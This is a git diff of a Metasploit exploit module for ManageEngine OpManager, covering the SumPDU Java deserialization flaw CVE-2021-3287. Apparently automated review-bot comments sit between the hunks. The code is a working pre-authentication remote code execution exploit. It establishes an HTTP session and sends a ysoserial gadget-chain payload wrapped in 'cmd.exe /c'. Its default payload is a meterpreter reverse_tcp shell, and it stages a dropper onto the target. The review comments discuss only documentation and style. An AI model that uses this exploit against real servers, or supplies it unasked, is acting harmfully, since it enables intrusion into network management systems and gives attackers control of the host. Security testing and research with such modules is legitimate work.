diff --git a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb
index f45d3727ecde0..1661713debc6c 100644
--- a/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb
+++ b/modules/exploits/multi/http/opmanager_sumpdu_deserialization.rb
@@ -7,29 +7,29 @@ class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 prepend Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::CmdStager
 include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::JavaDeserialization
+ include Msf::Exploit::Powershell
 def initialize(info = {})
- super(update_info(info,
- 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',
- 'Description' => %q{
-
- },
- 'Author' =>
- [
+ super(
+ update_info(
+ info,
+ 'Name' => 'ManageEngine OpManager SumPDU Java Deserialization',
+ 'Description' => %q{
+ },
+ 'Author' => [
 'Spencer McIntyre', # Metasploit module
 ],
- 'License' => MSF_LICENSE,
- 'Platform' => 'win',
- 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
- 'References' =>
- [
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+ 'References' => [
 [ 'CVE', '2021-3287' ],
 [ 'URL', 'https://haxolot.com/posts/2021/manageengine_opmanager_pre_auth_rce/' ]
 ],
- 'Privileged' => true,
- 'Targets' => [
+ 'Privileged' => true,
+ 'Targets' => [
 [
 'Windows Command',
 {
@@ -45,7 +45,7 @@ def initialize(info = {})
 {
 'Arch' => [ARCH_X86, ARCH_X64],
 'Type' => :win_dropper,
- 'CmdStagerFlavor' => :certutil, # This works without issue
+ # 'CmdStagerFlavor' => :certutil, # This works without issue
 'DefaultOptions' => {
 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
 }
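Review bot: `'Description' => %q{ }` is still empty after the metadata reformat, so the module carries no summary of what it exploits even though the Name, the CVE-2021-3287 reference and the linked write-up in the same hunk supply one. A short paragraph built only from those (ManageEngine OpManager, Java deserialization in the SumPDU handling, the pre-authentication claim the referenced post's title makes) would close that gap. Separately, `Msf::Exploit::Powershell` is newly included but nothing in the visible hunks calls into it, so a one-line comment naming the target that relies on it (presumably the 'Windows Command' target, whose body lies outside this hunk) would stop a later reader from treating the include as dead. The `initialize` body continues past the hunk.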
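Review bot: Commenting out `'CmdStagerFlavor' => :certutil` while keeping `# This works without issue` leaves a contradictory note in the dropper target: the line now documents a setting that is no longer applied and gives no reason for deferring to whatever flavor the CmdStager mixin selects by default. Either delete the line or replace its trailing comment with the rationale, e.g. `# 'CmdStagerFlavor' => :certutil, # left unset so CmdStager picks its default flavor; certutil is also known to work`. The target hash this sits in is opened and closed outside the hunk.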
@@ -61,32 +61,40 @@ def initialize(info = {})
 }
 }
 ]
- ],
- 'DefaultOptions' => {
- 'RPORT' => 8060,
- },
- 'DefaultTarget' => 0,
- 'DisclosureDate' => '2021-07-26'))
+ ],
+ 'DefaultOptions' => {
+ 'RPORT' => 8060
+ },
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2021-07-26',
+ 'Notes' => {
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'SideEffects' => [ ARTIFACTS_ON_DISK ],
+ 'Stability' => [ CRASH_SAFE ]
+ }
+ )
+ )
 register_options([
- OptString.new('TARGETURI', [ true, "OpManager path", '/'])
+ OptString.new('TARGETURI', [ true, 'OpManager path', '/'])
 ])
 end
 def check
- # todo: write this
+ # TODO: write this
 return Exploit::CheckCode::Unknown
 end
 def exploit
 # Step 1: Establish a valid HTTP session
 res = send_request_cgi({
- 'uri' => normalize_uri(target_uri.path),
+ 'uri' => normalize_uri(target_uri.path),
 'keep_cookies' => true
 })
- unless res&.code == 200 && res.headers['Set-Cookie'].to_s =~ /JSESSIONID=/
+ unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/
 fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session')
 end
+ print_status('An HTTP session cookie has been issued')
 # Step 2: Add the requestHandler to the HTTP session
 res = send_request_cgi({
@@ -99,6 +107,7 @@ def exploit
 unless res&.code == 200
 fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session')
 end
+ print_status('The request handler has been associated with the HTTP session')
 # Step 3: Exploit the deserialization vulnerability to run commands
 case target['Type']
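Review bot: `check` still returns `Exploit::CheckCode::Unknown` behind `# TODO: write this`, while the class prepends `Msf::Exploit::Remote::AutoCheck` and this hunk now declares `'Reliability' => [ REPEATABLE_SESSION ]`; the stub gives the autocheck gate nothing to act on, so what happens on each run depends on how AutoCheck treats Unknown (warn and proceed, or abort unless forced — verify against the mixin). The comment should at least state that consequence for the operator, e.g. `# TODO: write this; until then AutoCheck cannot gate on the target and Unknown is returned unconditionally`. A smaller point in the same hunk: `res.get_cookies =~ /JSESSIONID=/` uses `=~` where no capture is needed, and `res.get_cookies.match?(/JSESSIONID=/)` avoids the MatchData allocation and reads as the boolean it is. The hunk opens inside `initialize` and ends inside `exploit`, both of which extend beyond it.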
@@ -120,7 +129,7 @@ def execute_command(cmd, _opts = {})
 # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the
 # dependency on the commons-collections library making it usable in this context
- java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)
+ java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', "cmd.exe /c #{cmd}")
 res = send_request_cgi({
 'method' => 'POST',
@@ -128,5 +137,6 @@ def execute_command(cmd, _opts = {})
 'keep_cookies' => true,
 'data' => [ java_payload.length ].pack('N') + java_payload
 })
+ fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200
 end
 end
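Review bot: The new `"cmd.exe /c #{cmd}"` wrapper carries no comment saying why the command is no longer handed to the gadget as-is, even though the two comment lines directly above document the gadget choice in detail. Presumably the chain's sink executes the string without a shell, so shell syntax produced by the dropper stager would otherwise reach it verbatim; if that is the reason, write it down: `# wrap in cmd.exe /c so shell syntax emitted by the stager is interpreted rather than passed verbatim to the gadget's exec sink`. It is also worth noting in the same comment that this pins `execute_command` to Windows targets, consistent with `'Platform' => 'win'`. `execute_command` continues past this hunk.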
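Review bot: The added `fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200` treats any 200 as successful execution, but the status code only shows that the handler accepted the POST; whether the deserialized payload actually ran is not observable here, so the message overstates what was verified and a command that failed server-side still reads as success. Name what is actually checked, `'Unexpected reply when submitting the command payload'`, or add a comment stating the limitation, and consider a `vprint_status` on the success path so the repeated calls I would expect from the CmdStager mixin are traceable in verbose output. Aborting mid-stage also leaves partial dropper files behind, which the `ARTIFACTS_ON_DISK` note added earlier in the diff already covers. The `execute_command` definition this hunk closes begins in the previous hunk.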